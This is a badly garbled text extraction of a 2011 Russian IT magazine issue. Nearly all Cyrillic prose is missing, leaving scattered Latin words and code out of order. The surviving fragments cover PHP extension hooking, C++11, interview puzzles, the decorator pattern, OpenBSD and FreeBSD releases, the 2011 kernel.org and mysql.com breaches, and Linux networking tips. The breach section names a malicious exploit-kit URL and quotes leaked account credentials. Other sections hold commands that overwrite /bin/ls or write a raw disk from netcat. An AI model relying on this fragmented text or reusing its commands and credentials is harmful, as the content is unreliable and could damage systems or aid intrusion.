Release_TS , php5ts.dll, php.exe . ,
!


Visual Studio, . , FileNew Project,
Makefile Project,

099


OK. General
Dynamic Library (.dll) Configuration Type.
C/C++/General Additional Include Directories
( ): G:\www\php-5.3.8;
G:\www\php-5.3.8\main\; G:\www\php-5.3.8\TSRM\; G:\www\php5.3.8\Zend\. Linker/General Additional Library Directories G:\www\php-5.3.8\Release_TS. Linker/Input Additional
Dependencies php5ts.lib. .
(C/C++/
Preprocessor Preprocessor Definitions):
ZEND_WIN32=1
PHP_WIN32=1
WIN32=1
ZEND_DEBUG=0
ZTS=1
COMPILE_DL_XHOOKER=1

, Windows. . ;)
: ,
, , . .
ZEND_DEBUG , (
php5ts.lib, php5ts_debug.lib).
ZTS , ZTS ( PHP
Thread Safe Non Thread Safe).
ZEND_DEBUG ZTS
, - ,
: --.
--. read. ,
.
COMPILE_DL_XHOOKER, , .
configure, , (--withextension=shared). XHOOKER
.


?
, ,
. . ,
, ,
scan parse_date.c 21
(!), #pragma optimize ("", off ).

, ,
(
). Apache
, PHP-
. ,
MSVCR90.dll,
( , PE Tools
). ,
.
, MT.EXE ( , )
.

100

. .


- ,
, - . CMS
, ,

URL. , , CMS
.
get_included_files,
, , . ,
, . ,
fopen, file_get_contents, file readfile. , !
MySQL- .
. , , ( php.ini).

( : get_readed_files)
(, $_READED_FILES). php.ini (
, ini_set .htaccess
).
? PHP , . :
void zif_FUNCNAME(int ht, zval *return_value,
zval **return_value_ptr, zval *this_ptr,
int return_value_used TSRMLS_DC)

:
PHP_FUNCTION(FUNCNAME)

, , ,
, ,
( ). ,
, .

12 /155/ 2011

PHP

data->internal_function.handler = hacked_file;
}

.
( , ). , .
callback:
zval* argv[1];
zval* func;
zval* retval = NULL;
MAKE_STD_ZVAL(retval);
argv[0] = XH_G(_my_readed_files);
MAKE_STD_ZVAL(func);
ZVAL_STRING(func,"var_dump",0);
call_user_function(EG(function_table),
NULL, func, retval, 1, argv TSRMLS_CC);

Sara Golemon

, ZTS ? , .
, PHP
, , ,

. ,
- , ,
.
executor_globals,
EG. PHP- (HashTable*).
zend_function_entry,

.


, PHP
var_dump(). ,
callback. call_user_function,
. :
function_table, ( NULL),
, , ,
.
. MINIT :
zend_register_auto_global("_READED_FILES",
sizeof("_READED_FILES")-1,NULL TSRMLS_CC);

, _READED_FILES
($_READED_FILES). RINIT :
ZEND_SET_GLOBAL_VAR("_READED_FILES",
XH_G(_my_readed_files));

arr_hash = EG(function_table);
for(zend_hash_internal_pointer_reset_ex(
arr_hash, &pointer);
zend_hash_get_current_data_ex(arr_hash,
(void**) &data, &pointer) == SUCCESS;
zend_hash_move_forward_ex(arr_hash, &pointer))
{
if(!strcmp("file",
data->internal_function.function_name))
{
original_file = data->internal_function.handler;




EXECUTOR_GLOBALS
12 /155/ 2011

,
.
.
, , unset($GLOBALS['_
READED_FILES']),
.

,
EG (symbol_table). ,
( , ),
,
get_readed_files().
, TSRM.



PHP. .
, . , PHP-.
, SAPI
. . z

101

(bumshmyak@yandex.ru)


C++11:

C++

++
,


.

.

102

WWW
-
: bit.ly/
oVEtjX.

: bit.ly/
gRbESx.
FAQ ++11
:
bit.ly/1gNDCk.
++11
Danny Kalev: bit.ly/
mOTT91.

INFO


++0x,

2010
. ++

x

INTRO
2011 ISO C++ (ISO/IEC
14882:2011). C++11.
2003 .
,
. 2007
TR1,
, ,
.
ISO :
C++ ,
, ; C++
.
. -,
, . , rvalue references (move
semantics) constexpr. , . (threads), (regex),
(tuples), . ,
, ( 1320 ).
.
?

(https://wiki.apache.org/stdcxx/C%2B%2B0xCompilerSupport).

12 /155/ 2011

, , .
GCC,
GCC 4.6.1 .
C++11, -std=c++0x.
, .


,
.
auto,
, . :
auto
auto
auto
auto

x = 42; // int
pi = 3.14; // double
c = 'x'; // char
str = string("xxx"); // string

CHECKPOINT
, :
#include <type_traits>
auto x = 42;
static_assert(std::is_same<decltype(x), int>::value,
"42 is not int");
static_assert(!std::is_same<decltype(x), unsigned int>::value,
"42 is unsigned int");

std::is_
same<FirstType, SecondType>::value,
. type_traits,
. type_traits
.
, type_traits
, , ,
:

, C++11, , ,
. auto . , . ,

template
template
template
template

vector<string>::iterator start = hosts.begin();

<class
<class
<class
<class

T>
T>
T>
T>

struct
struct
struct
struct

POD-
.

auto start = hosts.begin();

int a[] = {1, 2, 3};

auto ,
- . :

struct Person {
const char* name;
int age;
};

template <class FirstType, SecondType>


void ShowMadSkills(FirstType first, SecondType second) {
auto third = first + second;
// ...
}


first second, third.

DECLTYPE STATIC_ASSERT
, , . decltype(expression)
. :
auto x = 2; // int
auto y = 2.0 // double
decltype(x + y) z; // double


static_assert. :
static_assert(expression, error_string)

static_assert , expression
.
- . expression
, error_string.
static_assert:
static_assert(sizeof(int) >= 4, "too small int");

12 /155/ 2011

is_pointer;
is_const;
add_const;
remove_reference;

struct Person person = {"John Doe", 42};

, - STL, push_back insert. ++11


(initializer lists). , :
vector<int> a = {1, 2, 3};
map<string, int> persons =
{{"John Doe", 42},
{"Bugs Bunny", 71}};

?
(std::initializer_list), , ,
. {...} ,
, .
std::initializer_list ,
, .
, , .
,
:
#include <initializer_list>
class SequenceClass {
public:
SequenceClass(std::initializer_list<int> list) :

103


data_(list.begin(), list.end())
{ }
int size() {
return data_.size();
}
private:
vector<int> data_;
};

cout << x << endl;


}

x seq, .
++11 , -.

-

. ++03
:
string a = "first";
string b("second");
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_(m) {}
};

, C++11,
, .
.
:
string a = {"first"};
string b{"second"};
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_{m} {}
};
D d{0};

, ,
std::initializer_list,
, . :
vector<int> a(4); // 4
vector<int> b{4}; // 4

, .
:
class D {
int m_ = 42;
};

(const static) .
, , .

FOR

- .
for,
.
:
vector<int> seq = {1, 2, 3, 4, 5};
for (auto x : seq) {

104

- (-, ) , .
, . .
- :
[capture list](parameters) -> return type {
body
}

-, parameters, , body,
return type. (capture list)
, ()
. ,
.
,
left right.
vector<int> a = {1, 2, 3, 4, 5};
int left = 2;
int right = 4;
int count = 0;
for_each(a.begin(), a.end(), [left, right, &count](int x) {
if (x >= left && x <= right) {
++count;
}
});
cout << count << endl;

? for_each
( ), .
-. .
, .
,
, &, . ,
.
void. , return
.
, -
, - , .
- , :
class F {
public:
F(int left, int right, int& count) :
left_(left),
right_(right),
count_(count)
{ }
void operator()(int x) const {
if (x >= left_ && x <= right_) {
++count_;

12 /155/ 2011

std::function<int (int)>& unary_operation) {


vector<int> res;
std::transform(input.begin(), input.end(),
back_inserter(res),
unary_operation);
return res;

Feature

GCC

Intel C++

MSVC

auto

4.4 (v1.0)

11.0(v0.9)

10.0 (v0.9)

decltype

4.3 (v1.0)

11.0(v1.0)

10.0 (v1.0)

static_assert

4.3

11.0

10.0

Builtin type_traits

4.3

10.0

8.0

Initializer lists

4.4

Non-static data member


initializers

4.7

Range-based for-loop

4.6

Lambda

4.5 (v0.9)

11.0 (v0.9)
12.0 (v1.0)

10.0 (v1.0)
11.0 (v1.1)

mymap, .

R-value references

4.3 (v1.0)

11.1 (v1.0)
12.0 (v2.0)

10.0 (v2.0)
11.0 (v2.1)

vector<int> seq = {1, 2, 3, 4, 5};


vector<int> neg = mymap(seq, [](int x) { return -x; });

}
}
private:
int left_;
int right_;
int& count_;
};

for_each c -
:
for_each(a.begin(), a.end(), F(left, right, count));

:
[] ;
[=] , ;
[&] , , ;
[this] , .
.
1 N.
vector<int> a;
int last = 0;
std::generate_n(back_inserter(a), N, [last]() mutable {
return ++last;
});

,
mutable. , -,
:

std::function<signature>, ,
,
. ,
mymap,
, .

, mymap , neg,
.
( ) .

neg , ,
, . ,
. ,
. ,

,
, .
C++11 .
rvalue references:
. .

.
class MovableType {
MovableType(MovableType&& rhs);
MovableType& operator=(MovableType&& rhs);
};

, rvalue references
&&.
MovableType ,
. ,
,
.
++11 ,
.

OUTRO
ReturnType operator()(...) const { ... };

, mutable.
map:
vector<int> mymap(const vector<int>& input,

12 /155/ 2011


C++11, ,
. , ++
, , , .
, . , C++11 . z

105

(ivinside.blogspot.com)


!
,
, ,
.
106

12 /155/ 2011

1
1 100000.
. , .

.
inotify Linux,
. ,
.

. , ,
, . 1,
100000, 1.
: (a1 + an) * N/2, a1 ,
an , N . ,

, .
. , :

, , .
,
.
:
random2()

2 * random2()

, . , random4() ,
, . ,
random4() random3(), :

from os import listdir


from random import randrange
from time import sleep
#
sum1 = sum(int(filename) for filename in listdir('./q1'))
# , 10 -
sleep(10)
#
sum2 = sum(int(filename) for filename in listdir('./q1'))
# ,
deleted = sum1

sum2

#
if deleted: print ' %s' % deleted
else: print ' '

#
def random2():
""" 0 1 """
return randrange(0, 2)
#
def random4():
""" 0, 1, 2 3 """
return random2() + 2 * random2()
#
def random3():
""" 0, 1 2 """
result = random4()
# ,
# , ,
#
if result == 3:
return random3()
return result

2
random2(), 0
1. random3(), 0, 1 2.

,
() ,
.

3
1: random4().
2: .

random4()?
, , random2(). :

, . .
. .
, , ?
: .

random2()

random2()

12 /155/ 2011

, . ! , ,
, ,
, . , .
.
: , , . , .

107


1
.
,
?
2
:
tokens = []
for token in tokeniter:
if token not in tokens:
tokens.append(token)

: ,
.

. - (youtu.be/
DTWZqh64RcQ). , ,
.
1. ,
chmod() .
Python :
# python2 -c "import os; os.chmod('/bin/chmod', 0755)"

Perl:
# perl -e 'chmod 0755, "chmod"'

tokensiter ,
, .

,

tokensiter.

.
3

Linux?
4
# nmap -sS -Pn -n -iL active-hosts
.
,
/ filtered.
?

, .
, ,
, . ,
,
.
, :
= 1
, :
__()
_()
__(-)
:

+= 1
' ', , ''

, ? ,
.
.

4
/bin chmod -x chmod. .

108

, , :
#include <sys/types.h>
#include <sys/stat.h>
int main()
{
chmod("/bin/chmod", 0000755);
}

2. GCC .
:
$ cat - > chmod.c
int main () { }
^D
$ cc chmod.c
$ cat /bin/chmod > a.out
$ mv a.out new_chmod
$ cat /bin/chmod > new_chmod
# new_chmod +x /bin/chmod

: . a.out, .
cat /bin/chmod
.
GCC,
. ,
/bin/chmod , .
:
# cp /bin/ls /bin/ls_prev && cat /bin/chmod > /bin/ls &&
> /bin/ls +x /bin/chmod && mv /bin/ls_prev /bin/ls

3. tar, :
$ tar --mode 0755 -cf chmod.tar /bin/chmod
$ tar xvf chmod.tar

, --mode,
. .
4. Cpio , ,
, 21-. ,
:

12 /155/ 2011

$ echo
cpio
perl
cpio

chmod |
-o |
-pe 's/^(.{21}).../${1}755/' |
-i -u

5. , ,
, /bin/chmod, . Debian- :
# apt-get install --reinstall coreutils


init) :
# init 6

, :
0 ;
1 , ;
2 ;
3 , ;
4 , ;
5 + ;
6 .

5
,
blob.dat.

, ,
:
def bstr(n):
""" ."""
return ''.join(
[str(n >> x & 1) for x in (7,6,5,4,3,2,1,0)])
#
f = file('blob.dat', 'rb')
#
bytes = f.read()
#
#
sheet = ''.join([bstr(ord(c)) for c in bytes])
# '1'
print sheet.count('1')

, .
:
,

. , popcnt.
Core i7 sse4.2.
: http://gurmeet.net/puzzles/fast-bit-counting-routines/.

init , , /etc/inittab.
3. Magic SysRq (
CONFIG_MAGIC_SYSRQ):
# echo 1 > /proc/sys/kernel/sysrq
# echo b > /proc/sysrq-trigger

4. : Alt + SysRq,
23 R E I S U B.
:
unRaw ( ),
tErminate ( SIGTERM ),
kIll ( SIGKILL , ),
Sync ( ),
Unmount ( ),
reBoot ( ).
,
CONFIG_MAGIC_SYSRQ (
).

7
IP-.

,
IP-,
, IP-.

Linux- .

def ip2str(ip):
""", IP-."""

1.
shutdown:
# shutdown -r now

, halt reboot,
,
shutdown. , halt shutdown -h now, reboot
, shutdown -r now.
2. , init ( telinit,

12 /155/ 2011

#
#
#
if

IPv4,
,
4
ip > 0xffffffff:
raise ValueError('number must be 32 bit')
ipstr = '{0}.{1}.{2}.{3}'.format(ip >> 24,
ip & 0x00ffffff >> 16,
ip & 0x0000ffff >> 8,
ip & 0x000000ff)
return ipstr


. z

109

000, 00spersky Lab


deeonis (deeonis@gmail.com)

,
- .
-. ?
, .
,
-,
. .
,
- .
, ,
, , ,
.
, - XXI ,
.




Hello world! ,
, ,
, . .
,
, ,
.
,
,
.
110


,
SMSBilling, .
float cost(), .
,
cost() , . , :
SMSBeeline, SMSMegafon SMSMts.

class SMSBilling
{
public:
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline

12 /155/ 2011

. - , , SMSBilling.
, , , .
, ,
.
, . ,
()
,
. ,
-.

class SMSBeelineUA: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineUACost;
};
...
}
class SMSBeelineBY: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineBYCost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA SMSMtsBY
// SMSBeelineUA SMSBeelineBY

,
, .
, SMSBilling,
. , SMSBeeline, SMSMegafon
SMSMts, SMSBeelineUA, SMSMtsBY . .
cost(), ,
.
,
. , ,
.
, - .
, -
?
cost() .
, ,
.
, , , :


class SMSBeelineUA: public SMSBeeline
{
public:
virtual float cost()

12 /155/ 2011

{
...
//
//
beelineUACost = __super::cost() * coefficientUA;
return beelineUACost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA

? ,
. SMSBeeline,
SMSMegafon SMSMts cost()
,
SMSMtsBY, SMSMegafonUA . .
. , ( RU),
cost(). ,
.


- ,
. .
,
5 %. , , . . ,
. , ,
7 %,
5 %- ,
12 %.
,
. .
, .

class SMSBeelineUABirthdayDiscount: public SMSBeelineUA
{
public:
virtual float cost()
{
...
//
//
//
beelineUABirthdayCost =
__super::cost() * coefficientBirthday;

111

return beelineUABirthdayCost;
};
...
}
//
// SMSBeelineUABirthdayDiscount

,
SMSBilling setDiscount(float),
,
.

class SMSBilling
{
private:
float m_discount;
public:
void setDiscount(float discount) {m_discount = discount;};
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline
class SMSBeelineUA: public SMSBeeline
{
public:
virtual float cost()
{
...
//

112

//
//
//
if

,
,

(m_discount != 0)
beelineUACost =
__super::cost() * coefficientUA * m_discount;
else
beelineUACost = __super::cost() * coefficientUA;

return beelineUACost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
billing = new SMSBeelineUA();
// ,
billing->setDiscount(0.1);
cost = billing->cost();

,
, ,
, ,
.
, .



. , ,
-. . ,
. , , SMSBilling
SMSBeeline, SMSMegafon SMSMts.
,
-. .
RegionDecorator,
SMSBilling.
,
SMSBilling.
. cost() RegionDecorator SMSBilling,
.
, . ,
.

12 /155/ 2011


class SMSBilling
{
public:
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
class RegionDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
RegionDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
virtual float cost() = 0;
...
}
class RURegionDecorator: public RegionDecorator
{
public:
RURegionDecorator(SMSBilling &billing) :
RegionDecorator(billing)
{}
virtual float cost()
{
float costRU = m_billing.cost() * coefficientRU;
return costRU;
}
...
}
// UARegionDecorator
// RURegionDecorator


, RURegionDecorator,
UARegionDecorator . .
.
SMSBilling.
:

//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
float cost = billing.cost();

.
.
cost()
.
DiscountDecorator.

12 /155/ 2011

DiscountDecorator
class DiscountDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
DiscountDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
virtual float cost() = 0;
...
}
class BirthdayDiscountDecorator: public DiscountDecorator
{
public:
BirthdayDiscountDecorator(SMSBilling &billing) :
DiscountDecorator(billing)
{
}
virtual float cost()
{
float costBirthday =
m_billing.cost() * coefficientBirthday;
return costBirthday;
}
...
}
// ""
// BirthdayDiscountDecorator
//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
billing = new BirthdayDiscountDecoator(billing);
//
//
float cost = billing.cost();


,
.
.
,
. ,
.
, -, (
setDiscount), -,
, ,
, .


. , :
, (
)
.
.

. z

113

(grinder@tux.in.ua),
(execbit.ru)

UNIXOID

INFO

OpenBSD
: 1
1 . 5.0
32 .


OPENBSD 5.0
FREEBSD 9.0


OpenBSD 2.3 2.4


,
Beastie,
Puffy
.

,


,
,

.
.
,

. OpenBSD FreeBSD

. ,


.

OpenBSD

BSD-
FreeBSD.
NetBSD DragonFlyBSD.

114


OpenBSD 19
(1995 ).

16 .

OpenBSD

LiveCD: MarBSD, Quetzal,
FuguIta, jggimi, OliveBSD,
AnonymOS, LiveCDOpenBSD, BSDanywhere
.

WWW
OpenBSD
openbsd.org.

OpenBSD openbsd.ru,
obsd.ru.

OpenBSD Journal
undeadly.org.
-
OpenBSD openports.se.

OPENBSD 5.0
OpenBSD 1995 , ,
NetBSD, -
.
, . Free, Functional and Secure
. , , , .
, , - ,
.
. (dhcpd, ntpd, bgpd) ,
.
API ( strlcat,
strlcpy, issetugid, arc4random ) (, Systrace, GCC/ProPolice), ,
OpenBSD .
OpenBSD ,
, Linux BSD-, (blob, binary linked

12 /155/ 2011

OpenBSD

OpenBSD 4.9 /etc/rc.d

object ),
. , ,
.
OpenBSD, gNewSense Gobuntu .
,
, BSD. ,
, Adaptec. ,
FSF , OpenBSD, .
( ,
, , ).
Makefile URL , . ,
.
OpenBSD 17
,
. BSD- ISC,
,
. BSD GPL,

. OpenBSD . , (sshd, ntpd, X ).
( Linux, , ), 16

. (Only two remote holes in the default install,
in a heck of a long time!) , (, openbsd.ru)
.

.
. 5.0.
: ,
, .
.

azalia(4), vr(4), bnx(4), em(4), ix(4), mpi(4)


.
Wake on LAN
(re, vr, xl).
pf IPv6 ACK,
MTU, (IPv4 MPLS).
ospfd Opaque LSA (Link-State
Advertisement), RFC2370/RFC5250
(911). ,
( ), .
graceful restart ( non-stop forwarding, RFC3623)
9, , MPLS (,
)
10. OpenBSD
MPLS-.
XORP XORQ SoftRAID RAID6,
.
,
i386.
USB-.
compat_freebsd, compat_linux .
, GNU Debugger.
tmux,
. -s , tmux-.
CWM
60 , Xinerama,
, . libdrm_radeon,
3D ATI.
sysctl kern.pool_debug,
POOL_DEBUG (
).
.
, . . , AMD64 bigmem .


malloc
.
,
. .
.

12 /155/ 2011

115

UNIXOID
(hexdump, tcpdump, libc) , UTF-8.
OpenBSD 4.9
/etc/rc.d. 5.0
,
/etc/rc.d rc- rc.{local,shutdown}.
netstat -vP, PCB- (Protocol
Control Block), .
disklabel '-F', UID,
fdisk mount ( ).
pkg scp://hostname/~user/subdir.
Beagle board (
OMAP3530 ARM
Cortex-A8, Texas Instruments DigiKey).

OPENSSH 5.9
OpenBSD , , .
PF, IPFilter
BSD, NTP
OpenNTPD, OpenOSPFD OpenBGPD. ,
CVS OpenCVS.
OpenSSH SSH,
.
OpenSSH 5.9, 6 ,

sandboxes ()
systrace, seatbelt rlimit.
( )
. sandbox ,
.
UsePrivilegeSeparation sandbox, .
,
,
SSH-, ,
.
. systrace


OPENBSD/IPSEC?
2010 OpenBSD
IPsec.
,
, . , ,
. : goo.gl/Rl964.

. systrace,
SYSTR_POLICY_KILL
( OpenBSD). seatbelt, OS X/Darwin, ,
. rlimit
, .
setrlimit()
. sandbox
UseLogin .
ssh_config Host,
, .
* ( ) ? ( ), 5.9 !. ,
, , :
# cat /etc/ssh/ssh_config
Host *.example.org !host1.example.org

SONG 5.0
OpenBSD .

, .
5.0 What Me Worry? (goo.gl/dRisZ).

PC-BSD 9
FreeBSD 9.0
- PC-BSD 9.
ZFS
GELI-,
(KDE 4, GNOME 2, XFCE 4, LXDE) .
,
Life-Preserver .
PBI- ,

,
.
, freebsd-update

(, 9.0 9.1).
OpenBSD LiveCD

116

12 /155/ 2011


SHA256: HMAC-SHA2-256, HMAC-SHA2-256-96, HMAC-SHA2-512
HMAC-SHA2-512-96. ssh-keysign
ECDSA.
AuthorizedKeysFile (sshd_config) ,
. (%h
, %u . .), .
: AuthorizedKeysFile
, (
).
UserKnownHostsFile/GlobalKnownHostsFile
.
5.7 IPQoS TOS/DSCP/QoS,
. IPQoS IPv6.
ssh-keygen '-A', (RSA, DSA ECDSA)
( ).
. , , ssh-add < /path/to/key,
ssh-add
.

FREEBSD 9.0
C FreeBSD
9.0. , .
FreeBSD Linux , ,
.
FreeBSD 9 DTrace,
Solaris.
7.0,
DTrace
.
/ .
/ ,
UNIX.

LLVM Clang, GCC , .
GCC,
GPLv3, LLVM/Clang BSD,
FreeBSD -

FreeBSD 9.0

12 /155/ 2011

OpenBSD

. ,

GCC LLVM/Clang.
,
, Jail-,
RCTL,
,
, setrlimit(). rctl
,
, SIGHUP
syslog (
, ).

Capsicum,
, . Capsicum
,
SELinux AppArmor, .
,
cap_new() cap_enter()
, (
),
/
.
, , ,
( tcpdump , chromium ).
TCP-,

117

UNIXOID

FreeBSD 9.0

BSD-

*nix-:
SMP- ( 32 CPU),
TCP- CPU,
(HTCP, CUBIC, Vegas, HD CHD),
(Congestion Control) TCP.
TCP- ERTT
(Enhanced Round Trip Time),
Congestion Control.
sysinstall,
,
BSDinstall, . , ,
GPT-, ZFS Jail. , BSDInstall
(,
, ) .
, BSDinstall .
USB-, USB 3.0, XHCI (eXtensible Host Controller Interface).
, USB 1.0/2.0,
OHCI, UHCI EHCI.
Soft Updates UFS . ,
, fsck. UFS
TRIM,
SSD- .
GEOM, , ,
4K, .

118

gpart
,
UFS
4/32 .
GEOM , -
,
.
gsched_rr,
.
AES GEOM- GELI XTS,
.
RAID-
ataraid graid, ATA. , , GEOM
. RAID
. Intel,
JMicron, NVIDIA, Promise SiliconImage.
RAID-: RAID0, RAID1, RAID1E, RAID10, SINGLE, CONCAT.
GEOM- HAST,
ggate ,

master .
ZFS 28, , :

(),

.
RAIDZ3, , ,
.
ZFS zfs diff.
NFS- .
UFS NFSv4 ACL POSIX ACL. z

12 /155/ 2011

>>>> coding
coding

UNIXOID

(execbit.ru)


KERNEL.ORG,
LINUX.COM,
LINUXFOUNDATION.ORG
MYSQL.COM


kernel.org
Linux.
linux.com
linuxfoundation.org,
mysql.com.
,
?
.

INFO
,
mysql.com,


: ClamAV,
Rising, TrendMicro
TrendMicro-HouseCall.

120

Gitolite,

kernel.org,

,

$1000 ,
.

KERNEL.ORG,

kernel.org , ,
. John Warthog9 Hawley, kernel.org, users@kernel.org
(pastebin.com/BKcmMd47)
. ,
HPA (H Peter Anvin), hera,
odin1, , , demeter2, zeus1 zeus2.
.
:
1. 12 .
2. , .
3. Xnest
/dev/mem, ,
.
, , ,
. . . . , kernel.org
,
Linux, ,
Git, Warthog9,
, Google+, kernel.org, ,
3Leaf Systems, C2 Microsystems, Orion Multisystems,
web- Iowa Interactive .

12 /155/ 2011

, , ,
!
- Warthog9 ,

Phalanx SSH-,
Warthog9 - . , Phalanx,
, , 2008 SSH-,
.
cd /etc/khubd.p2/ rkhunter, ,
, kernel.org.
, , , . ,
, SSH-
kernel.org, ,
root - , Phalanx, .
, , .
kernel.org. ,
.
, . Corbet Linux Foundation (goo.gl/7MyRu),
.
Git ,

. , Git
,
.
, ,
, , .
, , , ,
, .
, .
,
kernel.org . Linux
github.com, , , (https://github.com/
torvalds/linux). , .
kernel.org
, SSH-. SSH Git,
HTTP.
,
Gitolite,

.
: goo.gl/1brFK.

kernel.org ( ).

: LINUX.COM
LINUXFOUNDATION.ORG

kernel.org linux.com
linuxfoundation.org.
, . , , , ,
, kernel.org.
SSH-,
. ,

12 /155/ 2011

kernel.org

Linux Foundation
.
linux.com linuxfoundation.org,
Open Printing, Linux Mark Foundation events
. 6
.

. , ,
Linux Foundation , , .
? , , , ,
, ,
kernel.org, , Linux Foundation . ,
, ,
SSH
. ,
kernel.org ,
SSH- - Linux Foundation,

Linux .
linux.com
(goo.gl/N1DZX) .
,
, .
Guru-2012 linux.com
.

MYSQL.COM,
Armorize (goo.gl/PGKRi),
web-,
mysql.com. HackAlert,

, MySQL. .
, JS-, ,
, IFrame. , ,
truruhfhqnviaosdpruejeslsuy.cx.cc/main.php,
BlackHole exploit pack. - Adobe Flash, Adobe PDF Java
MW:JS:159, FTP- ( PHP-, HTML- JS-).

121

UNIXOID


KERNEL-
kernel.org Greg Kroah-Hartman
kernel.org
.
,
,
chkrootkit ,
,
,
, .
: goo.gl/VYyCl.

JS-, mysql.com

JS-, mysql.com ( )

, linux.com

122

, , .
( 22 ).
mysql.com Oracle ,
, .
, mysql.com.
, Trend Micro .
mysql.com,
,
sourcecOde.
3000 root-
, MySQL. ,
, JS- .
. , sourcecOde,
.
, uname -a whoami Fedora Core 11
http1.web.mysql.com. ,

root, nmap dig. ,
, root-,
. ,
www
.
.
mysql.com . SQL- .
. ,
,
, sys:phorum5,
sysadm:qa. admin:6661 (,
!), ,
,
,
web-.
, mysql.com

.

12 /155/ 2011

WINEHQ.ORG
FEDORAPROJECT.ORG

root- mysql.com


opensource-. Wine,
appdb.winehq.org. Jeremy White,
.
,
. , , Jeremy White,
. ,
web- phpMyAdmin
. phpMyAdmin
. ,
,
.
,
phpMyAdmin ,
, SSH- OpenVPN.
Fedora
SSH- , ,
,
kernel.org, linuxfoundation.org linux.com.
30 ,
.
: , ,
, 12
, 20 .

.


. ?
, ,
kernel.org, . GNU:
savannah.gnu.org. SQL- ,
. , PHP-.
48 ,
,
.
.
2010 Apache Software
Foundation, , , .
.
apache.org 2009 ,
apachecon.org, 0day-, SSH- backup-
people.apache.org .

, mysql.com

12 /155/ 2011

- , ,
. kernel.org , Linux Foundation -
SSH- , kernel.org,
mysql.com .
,
. z

123

SYN/ACK

hatchet (maks.hatchet@yandex.ru)

,


UNIX-
.

-, .
.
, .
124

,
,
, Bluetooth, -
,
RAID-. ,
, .

,
.
PPTP/PPPoE-, , /
, , -
DHCP-.
, network-manager DHCP-,
.
.
.
quickswitch, -

12 /155/ 2011

, , , ifup
Debian/Ubuntu, . ,
: http://muthanna.com/quickswitch.
Perl,
switchto /usr/local/bin.
quickswitch
,
/etc/quickswitch/switchto.conf :
# vi /etc/quickswitch/switchto.conf
[config]
//
device=eth0
//
servicefilename=/etc/quickswitch/switchto.last
// home
[home]
description=home
address=192.168.0.25
netmask=255.255.255.0
gateway=192.168.0.1
dns1=195.62.99.42
dns2=195.62.97.177
// work
[work]
description=work
address=10.16.3.114
netmask=255.255.255.0
gateway=10.16.3.249
dns1=195.62.99.42


switchto:
$ sudo switchto work
$ sudo switchto home

,
,
wpa_supplicant. :

12 /155/ 2011

$ su -s
# mv /etc/wpa_supplicant.conf /etc/wpa_supplicant.conf.bak
# wpa_passphrase ssid/- >> \
/etc/wpa_supplicant/wpa_supplicant.conf

:
$ sudo ifconfig wlan0 up
$ sudo iwconfig wlan0 essid $net
$ sudo wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
$ dhcpcd wlan0

, . , , :
# vi /usr/local/bin/tryconnect.sh
#!/bin/sh
# ( /etc/quickswitch/switchto.conf)
NETS="home work"
# ( SSID)
WNETS="home work"
#
# DNS-.
#
tryping() {
if ping -q -n -c 1 8.8.8.8; then exit; fi
}
# ,
tryping
# , $NETS
for net in NETS; do
switchto $net; sleep 10
tryping

125

SYN/ACK


FTP DD


OPENBSD

,

speedtest.net. ftp-:

OpenBSD
:

ftp> put "|dd if=/dev/zero bs=1M count=100" /dev/null


ftp-
100
.

//
# ifconfig em0 up
//
# ifconfig ath0 nwid my_wlan up
//
# ifconfig trunk0 trunkproto failover \
trunkport em0 trunkport ath0 \
192.168.1.1 netmask 255.255.255.0
Wi-Fi.

done
# , DHCP
dhcpcd eth0
sleep 5
tryping
# , Wi-Fi
killall dhcpcd
ifconfig wlan0 up
# Wi-Fi-
for net in WNETS; do
iwconfig wlan0 essid $net
wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
sleep 10
dhcpcd wlan0
sleep 5
tryping
done


netcat, ,
(
-2 -1):
-1# netcat -l -p 9000 | dd of=/dev/sda
-2# dd if=/dev/sda | netcat IP--1 9000
, ,
100 %, .

crontab,
, , ,
:
$ sudo crontab -e
*/5 * * * * /usr/local/bin/tryconnect.sh

. network-manager
.
PPPoE/PPTP-
3G- wvdial.

BLUETOOTH-


Wi-Fi, . ? ,
, Wi-Fi-
.
Bluetooth, ,
( USB-Bluetooth-)
.
Bluetooth
IP-, Linux,
BSD-. PAN (Personal
Area Networking), BNEP (Bluetooth Network
Encapsulation Protocol).

126

quickswitch

12 /155/ 2011

Linux :
1. ,
, pand, :
$ sudo pand -listen -role NAP

2. bnep0, pand:
$ sudo ifconfig bnep0 192.168.0.1

3. - pand bnep0 (MAC-


hcitool scan Bluetooth):
$ sudo pand -connect MAC--
$ sudo ifconfig bnep0 102.168.0.2
$ sudo route add default 192.168.0.1

, ,
, NAT:
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A POSTROUTING \
-o eth0 -j MASQUERADE

FreeBSD:
1. sdpd,
Bluetooth- ,
Bluetooth-:
# kldload ng_ubt
# /etc/rc.d/sdpd start

2. - btpand :
# ifconfig tap0 create
# btpand -i tap0 -s NAP
# ifconfig tap0 192.168.0.1 netmask 255.255.255.0

3. - :
#
#
#
#

ifconfig tap0 create


btpand -d ubt0 -i tap0 -s NAP -a MAC--
